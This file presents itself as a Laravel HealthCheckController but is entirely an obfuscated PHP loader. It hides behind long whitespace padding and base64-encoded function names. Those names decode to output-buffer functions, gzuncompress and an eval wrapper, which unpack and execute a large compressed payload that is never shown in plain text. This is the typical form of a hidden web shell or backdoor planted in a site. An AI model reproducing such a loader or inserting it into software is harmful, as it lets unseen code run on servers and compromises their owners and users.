<?php 
        $__='printf';$_='Loading app/Http/Controllers/Api/HealthCheckController.php';
        











































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWltvm0gUfo+0/yEPldxVVgnGcVoU5cE45maXxtgeYF4qmHHAZrg0+IZ//R7ATuJcdhNt1VWr+dDYXIaZc75zzsfI5vi4xodvgKtGdjdLFreNy+pwh6uGl2Vn2mKRnXXTZHGXMja9y8862exMm3psEXbDKYkeLp1mYXbcZV6en56eNi6PdjMc/3HEN779rO2oTOHjH4irZ2caTlPKXbs5w2rvqlGdesj2N2FXZlfHHBwcHL8nGiRGAnWMpa4i0bXXqaFIt04RfapFE1SzlutvnCoODg4ODg4ODg6OXw385wwODg6O3xcN38unF+ff6JSkdNq45IxwcHBwcHD8Jxy+e3E9TM1u3A59G22JqszxSJaJJpORZglE2Vz7YlsgsZT7KipIcyMTNfpU3ZOgLfRVpqrJiGZlvngO57MmESfByN7k1G5mfqwIGG10qllrRzEYcRAjreFr/cbUkdd+yxCcHg5dUYmwYxKrp7+rf2X3db63z/DVTdO32dJ1LOYoZhN8W5HEIlaszF3bYuCT6dos/7oW+tQxmd5jua+hhWe3Q6oiMmmhNVGlgiob1bXNEKtoC+MIMG+IxUnNRWzmrmNu9V7IXHsjeD0zxbZ5NxSlJdWMFdjAyExmU81ifmxtdWVTcTwRUUFjNq/sVlHoa1Y6FGEMcfH0+CAOwEc5b6B3O8GgSL/v9/VuGkwFGfgJGYmZgFVpfjsU+vW1zvfBerevyU033mRuIcfUbs+pylb+TC6wTTPSAk6inR9q7QcpwhF2lCbYKehdq9jv9/dja8D3rLOzoRMYYLfnfFncJDSjanhDHWtNnWHaH0O/4N6esq0GhbwmMfDtoMWDH2WzYH62HYzbwLmlY1vJYay5p6K5VwQJ0QwGcW36I5LrKm76sSl4trTUu0H21J7aRquYjuRPh3M8tDpv0gsqMoiftK44Sb6kdkFnEFvmtFDhjUhwMz4PXIgrjlnS79ItdgzRs6EGijbkAAshN5eD2Fr5tpL5M5I5o+i5LY8a+NfyHCst443LGitC32gGi0mMNhRqEnIwGqCSxyDRr4UTvUvd8aSuqfs+XUr7wwNen7Z9LCa+uGD+LJxDPsWeTVKjBbYnOHNFtB3Em3BqK0vXPl8SEc3Lv1WNIspe46xuwgkWkQBchKANKzrvrYiKctduJ1gELsR7LnJdyRNPlCKMpLJWQ6PoSDcz+V9t8UTUNgr2Bh+tFGqk1e9GL8RZlnTVhJo2U70bPtatwFAnL+dMfR/ku9Uk8XmAYyUndc0/G7vSgWc5ZzCqoQJqSyAJYl/Xj+2XpVfqIQKtCt1Y2eJDfyOIX0YK4QR0K9rrg1vpQ54aogW+KVWuGsU6wAlauq3aP+AjmK6fcwfa1P4Hv3vDeXpR5rofo51GBBnkawJ8DLH6ua7nZz4LUB+K4IpB0O+hc4hlXUuzToRHL9vxhKsYtGeLXx77KV9Vu//7H2qc2k/iowlZyfthzD6vQDME0nkPv9C/+2O0ZtKyViRWEjxOLzBoXKlnOLHWUGuLG8gxv4cz0PntL57HrKr7d3GMFuWz+Aflb/1cn2dlvo6ndjMGnWkjzQj9xKzWDTAuaIYpuE61/ytzDc9QKaJ2nZfvfI6usLav77fm972NIdE6aX8knHiOOXxsQxkzY+YG+uhRH1XZWiqaUZuavmgxC9ZYsA5hGOZ5rVZuipqH165/fUUvbkcP8SzXQGVrXB4d/fyF9lX1/XF39Ofle25/dO9bbvzwMOHHRvnZ+Ot+Wv6eNN/+j/ekD3Pz40Ex1Kn55+XfPeMT+g==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































































































                                                                                                                                                                                                                     $________;
